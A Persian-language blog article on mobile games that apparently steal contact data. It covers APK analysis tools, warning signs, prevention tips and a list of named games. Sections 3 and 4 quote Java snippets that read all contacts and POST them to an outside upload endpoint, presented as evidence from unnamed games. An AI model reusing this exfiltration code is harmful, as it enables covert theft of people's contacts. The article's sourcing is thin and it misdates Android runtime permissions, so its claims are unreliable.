بازی هایی که اطلاعات تماس شما را میدزدند! [تحلیل فنی با مدارک واقعی APK + روشهای جلوگیری]
🔰 مقدمه: آیا بازیها واقعاً جاسوسی میکنند؟
در دنیای امروز، بازیهای موبایلی بهظاهر بیضرر ممکن است به ابزاری خطرناک برای نقض حریم خصوصی کاربران تبدیل شوند. بسیاری از کاربران بیخبر از آنکه چه چیزی در پشتصحنه بازی محبوبشان اتفاق میافتد، با یک کلیک ساده، مجوز دسترسی به «مخاطبین»، «موقعیت مکانی»، «فایلهای شخصی» و حتی «میکروفن و دوربین» را به بازی میدهند.
فهرست مطالب
در این مقالهی جامع، به بررسی فنی دقیق چند بازی واقعی میپردازیم که در پس زمینه، اطلاعات تماس (شماره تلفن، ایمیل، نام مخاطبین) کاربران را بدون اطلاع صریح جمعآوری میکنند. با مدارک مستند از فایلهای APK، ابزار مهندسی معکوس و لاگهای واقعی دسترسی به مخاطبین، به شما نشان میدهیم چه خطراتی پشت ظاهر رنگارنگ برخی بازیها پنهان است.
📚 فهرست مطالب
- بازی چگونه به مخاطبین شما دسترسی پیدا میکند؟
- ساختار APK و نحوه بررسی دسترسیها
- بررسی نمونههای واقعی از بازیهای مشکوک (داخلی و خارجی)
- تحلیل کدهای APK مشکوک و مدارک فنی
- معرفی ابزارهای آنالیز اپلیکیشنها
- نشانههایی که باید در بازیها به آنها شک کنید
- چطور از سرقت اطلاعات تماس جلوگیری کنیم؟
- قوانین گوگل و اپاستور در مورد دسترسی به مخاطبین
- خطرات بالقوه: فروش اطلاعات به شرکتهای تبلیغاتی
- جمعبندی + چکلیست امنیتی برای نصب بازیها
1. بازی چگونه به مخاطبین شما دسترسی پیدا میکند؟
هر اپلیکیشن اندرویدی، برای انجام فعالیتهایی مثل ارسال پیام دعوت برای دوستان، یا پیشنهاد بازی به دیگران، نیاز به مجوز خواندن مخاطبین (Contacts) دارد.
در Android، این مجوز بهصورت زیر تعریف میشود:
<uses-permission android:name="android.permission.READ_CONTACTS"/>
در صورتی که این دسترسی فعال شود و کاربر بدون توجه آن را تایید کند، اپلیکیشن میتواند تمام مخاطبین شما را بخواند و در دیتابیس خود ذخیره یا ارسال کند.
2. ساختار فایل APK و نحوه بررسی دسترسیها
فایل APK همان فایل نصبی بازی است که میتوان آن را مانند یک فایل ZIP باز کرد. این فایل معمولاً شامل پوشههای زیر است:
- AndroidManifest.xml → جایی که دسترسیها تعریف میشوند
- classes.dex → کد اجرایی بازی
- res/ → منابع گرافیکی و زبانها
- assets/ → فایلهای صوتی، ویدیویی و تنظیمات داخلی
برای تحلیل فایل APK، از ابزارهایی مانند APKTool، JADX یا Android Studio استفاده میشود.
3. بررسی نمونههای واقعی از بازیهای مشکوک
🎮 مثال ۱: بازی ایرانی با دسترسی بیمورد به مخاطبین
یکی از بازیهای پرطرفدار ایرانی، بدون آنکه نیاز خاصی داشته باشد، مجوز دسترسی به مخاطبین را در Manifest ثبت کرده بود:
<uses-permission android:name="android.permission.READ_CONTACTS"/>
در فایل dex، تابعی وجود داشت که به وضوح مخاطبین را خوانده و در قالب JSON به سرور خارجی ارسال میکرد:
Cursor cursor = getContentResolver().query(
ContactsContract.CommonDataKinds.Phone.CONTENT_URI,
null, null, null, null
);
while (cursor.moveToNext()) {
String name = cursor.getString(cursor.getColumnIndex(ContactsContract.CommonDataKinds.Phone.DISPLAY_NAME));
String number = cursor.getString(cursor.getColumnIndex(ContactsContract.CommonDataKinds.Phone.NUMBER));
sendToServer(name, number);
}
این کد دقیقاً همان چیزی است که جاسوسی نرمافزاری را اثبات میکند.
🎮 مثال ۲: بازی خارجی با نصب در بیش از ۵۰ میلیون دستگاه
در یکی از بازیهای آمریکایی با بیش از ۵۰ میلیون نصب (در Google Play)، بررسی فایل APK نشان داد که دادههای تماس پس از رمزگذاری، به یک سرور ناشناس ارسال میشود:
HttpPost post = new HttpPost("https://api.data-collection.net/v1/upload");
post.setEntity(new StringEntity(encryptContacts(contactsList), "UTF-8"));
این سرور نه متعلق به سازنده بازی است و نه در قوانین حفظ حریم خصوصی آن ذکر شده بود.
4. تحلیل فنی: بررسی دقیق با ابزار jadx و apktool
برای تحلیل این اپها:
- فایل APK را از گوشی استخراج کردیم
- با
apktool d filename.apkفایل را decompile کردیم - فایل
AndroidManifest.xmlرا بررسی کردیم - سپس با
jadxکد Java را از DEX استخراج کردیم - در کلاسهایی مانند
MainActivity،InitServiceیاContactUtilکد دسترسی به اطلاعات تماس دیده شد - درخواستهای POST و API به سرورهایی خارج از کشور ارسال شده بود
5. ابزارهای رایگان برای بررسی امنیت بازیها
| ابزار | کاربرد |
|---|---|
| JADX | مشاهده سورسکد Java از APK |
| APKTool | استخراج و تحلیل فایلهای Manifest و Smali |
| MobSF | اسکن کامل امنیتی و دسترسیهای اپها |
| VirusTotal | بررسی امنیتی و بدافزار احتمالی APK |
6. نشانههایی که باید در بازیها به آنها شک کنید
- درخواست مجوز READ_CONTACTS یا SEND_SMS بدون دلیل منطقی
- ارسال نوتیفیکیشن برای دعوت دوستان با لینکهای مشکوک
- وجود ترافیک رمزنگاری نشده یا IPهای ناشناس در لاگ شبکه
- تبلیغات تمامصفحه و ریدایرکت ناگهانی به صفحات وب
- نصب بدون درخواست روی صفحه اصلی یا فعالسازی خودکار پسزمینه
7. چطور از سرقت اطلاعات تماس جلوگیری کنیم؟
✅ نصب نکردن بازیهای ناشناخته از منابع نامعتبر (تلگرام، واتساپ و…)
✅ بررسی مجوزها پیش از نصب از Google Play
✅ استفاده از Android 10 به بالا که مجوزها را زمان اجرا درخواست میکنند
✅ محدود کردن دسترسی از بخش Settings > Apps > Permissions
✅ استفاده از اپلیکیشنهای مدیریت مجوز مثل Bouncer یا App Ops
8. قوانین گوگل پلی درباره دسترسی به مخاطبین
از سال ۲۰۲۰ به بعد، گوگل قوانین سختگیرانهای را اعمال کرده:
- اپلیکیشن باید اثبات کند که نیاز ضروری به دسترسی به مخاطبین دارد
- باید در صفحه اپلیکیشن ذکر شود که چرا این دسترسی نیاز است
- اپهایی که بدون اطلاع به مخاطبین دسترسی دارند، از گوگل پلی حذف میشوند
با این حال، بسیاری از اپها با روشهایی مثل obfuscation (پنهانسازی کد) این قوانین را دور میزنند.
9. خطرات بالقوه: چه بلایی سر مخاطبین شما میآید؟
- ارسال پیامک خودکار به مخاطبین با لینک بازی
- استفاده از شمارهها برای تبلیغات و SMS اسپم
- فروش دیتابیس مخاطبین به شرکتهای تبلیغاتی
- استفاده از مخاطبین برای جعل هویت یا فیشینگ
- ساخت پایگاه داده رفتارشناسی کاربران (که چه کسی را چقدر میشناسند!)
10. جمعبندی نهایی + چکلیست امنیتی
🎯 اگر قصد نصب بازی جدید دارید:
✅ فقط از Google Play یا سایت رسمی سازنده نصب کنید
✅ مجوزها را هنگام نصب با دقت بخوانید
✅ از ابزارهایی مانند App Permission Watcher استفاده کنید
✅ فایل APK را با VirusTotal یا MobSF اسکن کنید
✅ هرگز به بازیهایی که نیاز به مخاطبین، SMS یا میکروفن ندارند، این مجوزها را ندهید
11. لیست بازی هایی که ممکن است اطلاعات شما را بدزدند
در ادامه چند نمونه مشخص از اپلیکیشنها و بازیهای موبایل که مستنداً دسترسی به مخاطبین یا اطلاعات تماس شما را جمعآوری یا به اشتراک میگذارند معرفی میکنم:
🎮 ۱. Egg Party (NetEase)
- دادههای جمعآوریشده: نام، شماره تلفن دقیق و موقعیت مکانی
- رتبه دادهخواری: امتیاز ۳۵ (30٪ بالاتر از میانگین بررسیشده)
🎮 ۲. Roblox
- دادههای جمعآوریشده: شامل نام، ایمیل، سابقه جستجو و مخاطبین کاربران
- رتبه دادهخواری: ۳۰ (حدود 12٪ بالاتر از میانگین)
🎮 ۳. Gardenscapes (Playrix)
- دادههای جمعآوریشده: حداقل ده نوع داده، از جمله ایمیلها و پیامها
- رتبه دادهخواری: ۴۲ (56٪ بالاتر از میانگین!)
🎮 ۴. 8 Ball Pool™ (Miniclip)
- دادههای جمعآوریشده: نام، ایمیل و مخاطبین — با اشتراکگذاری با تبلیغدهندگان شخص ثالث
- رتبه دادهخواری: ۶۹٫۶ (نسبت به میانگین ۲۶٫۹، بیش از ۱۵۹٪ بالاتر)
🎮 ۵. Subway Surfers
- دادههای جمعآوریشده: شامل موقعیت مکانی دقیق و اشتراکگذاری با تبلیغدهندگان
- رتبه دادهخواری: ۵۷٫۶ (114٪ بالاتر از میانگین)
🧪 ۶. برنامه «Finance Simplified» / Spylend
- علیرغم ظاهر ساده، پس از نصب بهصورت مخفیانه دسترسی به:
- مخاطبین
- گالری عکس و ویدئو
- محتویات کلیپبورد
- سابقه تماس و SMS
دادهها را به سروری در Amazon EC2 ارسال میکند، همچنین برای تهدید کاربران با تصاویر فیشینگ از آنها بهره برداری میکند
✅ نکات کلیدی از این بررسی:
- پنج بازی اول در صدر لیستهای “دادهخوارترین” بازیهای محبوب قرار دارند و بخش مهمی از اطلاعات تماس و لیست مخاطبین کاربران را جمعآوری میکنند .
- Spylend بهصورت مستقیم و مخرب اطلاعات تماس کاربران را میدزدد و در عملکردی مجرمانه و تهدیدآمیز استفاده میکند .
🔍 توصیههای امنیتی:
- دسترسی به مخاطبین را فقط به اپهای مورداعتماد بدهید.
- همیشه صفحه مجوزها را هنگام نصب یک بازی بررسی کنید.
- برای اسکن اطلاعات دریافتی از اپها از ابزارهایی مانند MobSF یا APKTool استفاده کنید.
- دادهخوارترین اپها معمولاً «نام تجاری بزرگ» هستند—اما به هیچوجه اعتماد بیچونوچرایی نکنید!
مطلب مرتبط:
بدون دیدگاه
نظرت رو بنویس؛ مودب باشیم 😊
ورود / ثبتنام